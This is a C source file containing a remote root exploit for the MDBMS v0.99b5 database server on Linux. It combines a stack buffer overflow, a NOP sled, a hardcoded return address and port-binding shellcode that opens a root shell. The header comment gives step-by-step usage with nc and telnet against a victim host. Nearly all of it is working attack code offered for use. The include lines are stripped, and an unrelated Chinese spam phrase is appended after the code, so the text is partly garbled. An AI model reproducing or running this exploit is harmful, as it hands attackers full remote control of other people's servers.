/* * Since this has gone public, heres my version.... * * Remote root MDBMS exploit for linux * by diab * * * Tested against MDBMS v0.99b5 on a Redhat 6.0 box * To obtain MDBMS: http://linux.davecentral.com/892_dataclients.html * * Usage: Step 1: (./mdbms-exp offset ; cat) | nc victim 2223 * Step 2: telnet victim 30464 (should be in a interactive shell) * * *NOTE*: The MDBMS server crashes once the exploit is sent, so you * really only have one chance until the admin restarts the * server, which could be on the next reboot or whatever. */ #include #include #include #include #define BUFLEN 1000 #define NOP 0x90 #define RET 0xbfffd278 /* port binding shellcode stolen from Taeho Oh's tutorial */ /* props to him 8) */ char shellcode[]= "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0" "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06" "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89" "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31" "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80" "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04" "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd" "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80" "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f" "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89" "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31" "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff"; int main (int argc, char *argv[]) { char buf[BUFLEN]; int i, offset; long addr; if(argc>1) offset = atoi(argv[1]); else offset = 0; addr = RET + offset; for (i = 0; i < BUFLEN; i += 4) *(long *) &buf[i] = addr; for (i = 300; i < (BUFLEN - strlen (shellcode) - 100); i++) *(buf + i) = NOP; /* greets: #hpaus, #ozsecurity, #x25 */ fprintf(stderr,"\nUsing address 0x%lx\n\n", addr); memcpy (buf + i, shellcode, strlen (shellcode)); sleep(1); printf("\\h %s\r\n", buf); return; }

亚洲欧美在线